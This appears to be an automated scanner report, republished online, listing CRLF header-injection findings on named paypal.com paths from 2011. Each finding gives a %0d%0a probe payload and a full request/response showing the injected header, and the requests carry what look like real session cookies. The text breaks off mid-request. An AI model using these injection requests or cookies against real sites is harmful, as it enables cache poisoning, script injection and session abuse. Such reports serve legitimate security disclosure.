XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.paypal.com

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. https://www.paypal.com/IntegrationCenter/ic_home.html [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/IntegrationCenter/ic_home.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b1f19%0d%0a51acb0f0e47 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b1f19%0d%0a51acb0f0e47/ic_home.html HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:49:02 GMT
Server: Apache
Location: https://www.paypalobjects.com/b1f19
51acb0f0e47/ic_home.html
Content-Length: 269
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.2. https://www.paypal.com/WEBSCR-640-20110722-1/css/browsers/ie8.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/browsers/ie8.css

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f7cbc%0d%0a2350d1e235c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f7cbc%0d%0a2350d1e235c/css/browsers/ie8.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/f7cbc
2350d1e235c/css/browsers/ie8.css
Content-Length: 277
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.3. https://www.paypal.com/WEBSCR-640-20110722-1/css/browsers/ie8.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/browsers/ie8.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 90806%0d%0a5cb329a3c58 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/90806%0d%0a5cb329a3c58/browsers/ie8.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/90806
5cb329a3c58/browsers/ie8.css
Content-Length: 295
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.4. https://www.paypal.com/WEBSCR-640-20110722-1/css/browsers/ie8.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/browsers/ie8.css

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 52af6%0d%0a9f7ca2aa7ac was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/css/52af6%0d%0a9f7ca2aa7ac/ie8.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:02 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/52af6
9f7ca2aa7ac/ie8.css
Content-Length: 290
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.5. https://www.paypal.com/WEBSCR-640-20110722-1/css/core/core.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/core/core.css

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6de62%0d%0a3b35e9f7823 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6de62%0d%0a3b35e9f7823/css/core/core.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:53 GMT
Server: Apache
Location: https://www.paypalobjects.com/6de62
3b35e9f7823/css/core/core.css
Content-Length: 274
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.6. https://www.paypal.com/WEBSCR-640-20110722-1/css/core/core.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/core/core.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c41bc%0d%0a99483c46daa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/c41bc%0d%0a99483c46daa/core/core.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:57 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/c41bc
99483c46daa/core/core.css
Content-Length: 292
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.7. https://www.paypal.com/WEBSCR-640-20110722-1/css/core/core.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/core/core.css

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 56ba3%0d%0a96542c3c173 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/css/56ba3%0d%0a96542c3c173/core.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:00 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/56ba3
96542c3c173/core.css
Content-Length: 291
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.8. https://www.paypal.com/WEBSCR-640-20110722-1/css/marketing/marketing.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/marketing/marketing.css

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72aef%0d%0a24258355876 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72aef%0d%0a24258355876/css/marketing/marketing.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:53 GMT
Server: Apache
Location: https://www.paypalobjects.com/72aef
24258355876/css/marketing/marketing.css
Content-Length: 284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.9. https://www.paypal.com/WEBSCR-640-20110722-1/css/marketing/marketing.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/marketing/marketing.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload da179%0d%0a1b0aed1234e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/da179%0d%0a1b0aed1234e/marketing/marketing.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; 